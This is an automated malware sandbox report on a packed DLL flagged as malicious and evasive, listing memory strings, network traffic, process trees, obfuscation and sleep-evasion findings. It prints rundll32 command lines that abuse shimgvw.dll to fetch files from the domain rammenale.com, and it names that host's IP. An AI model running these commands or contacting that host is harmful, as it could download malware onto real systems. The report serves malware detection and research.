Source: rundll32.exe, 00000005.00000002.3372199010.0000000004FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogDevice
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogID
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogcyS
Source: rundll32.exe, 00000005.00000002.3369108734.0000000000AB7000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369090469.00000000007B7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regM
Source: rundll32.exe, 0000000D.00000002.3371682679.0000000004D3A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3371682679.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp%S
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp%f
Source: rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp&bt
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp(f
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp0s
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp1
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp2J
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3bt
Source: loaddll32.exe, 00000000.00000002.2160984366.0000000000D4C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp3w
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4$
Source: rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp43f
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp44uz
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4D
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4F
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4I
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4d
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4er
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4m
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4w
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp4z
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003Vbt
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp8
Source: rundll32.exe, 00000008.00000002.3369525975.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369204567.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3370380512.0000000000C20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp:
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp?J
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpBJj
Source: rundll32.exe, 00000003.00000002.2132858298.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2133337781.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369773765.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3369384121.0000000000500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.0000000003500000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369536080.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369313271.00000000009B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 00000008.00000002.3373826197.000000000484A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpE
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpK
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpOJ
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpP
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpS
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpWJz
Source: rundll32.exe, 00000008.00000002.3369773765.00000000007BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpbS
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000A52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpentfc
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpgQ
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmphbt
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpjS
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpk
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpkJ
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpkbu
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpl
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmplS
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpm
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpmbt
Source: rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpnf
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpp
Source: rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmppv
Source: rundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpq
Source: rundll32.exe, 00000009.00000002.3369940309.00000000035C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmprI3-
Source: loaddll32.exe, 00000000.00000002.2160947833.0000000000C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpsC:
Source: rundll32.exe, 00000008.00000002.3369773765.000000000073E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpsoft
Source: rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpu
Source: rundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpuS
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rammenale.com/for2/regit.tmp~
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEB3BD 0_2_6BEEB3BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF612B 0_2_6BEF612B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEFB869 0_2_6BEFB869
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEB07B 0_2_6BEEB07B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEB71C 0_2_6BEEB71C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF5C80 0_2_6BEF5C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6B71C 3_2_6FE6B71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE75C80 3_2_6FE75C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6B3BD 3_2_6FE6B3BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7612B 3_2_6FE7612B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7B869 3_2_6FE7B869
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6B07B 3_2_6FE6B07B
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6BEE5570 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6FE65570 appears 44 times
Uses 32bit PE files
Source: LLD5HDX0PS.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal84.evad.winDLL@20/0@1/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: LLD5HDX0PS.dll Virustotal: Detection: 10%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: LLD5HDX0PS.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEFBF81 push ecx; ret 0_2_6BEFBF94
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEFFD0D push esi; ret 0_2_6BEFFD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7BF81 push ecx; ret 3_2_6FE7BF94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7FD0D push esi; ret 3_2_6FE7FD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C0358B push edx; iretd 4_2_00C0358C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C02D93 push edx; iretd 4_2_00C02D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C0321B push edx; iretd 4_2_00C0321C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C02E7B push edx; iretd 4_2_00C02E7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04D4E842 push 73A07743h; retf 0000h 5_2_04D4E91A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00E5CF3C push esp; iretd 8_2_00E5CF3D
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Found large amount of non-executed APIs
Source: C:\Windows\System32\loaddll32.exe API coverage: 9.7 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 8.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6044 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6136 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF38F4 FindFirstFileExW, 0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE738F4 FindFirstFileExW, 3_2_6FE738F4
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 30000 Jump to behavior
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9
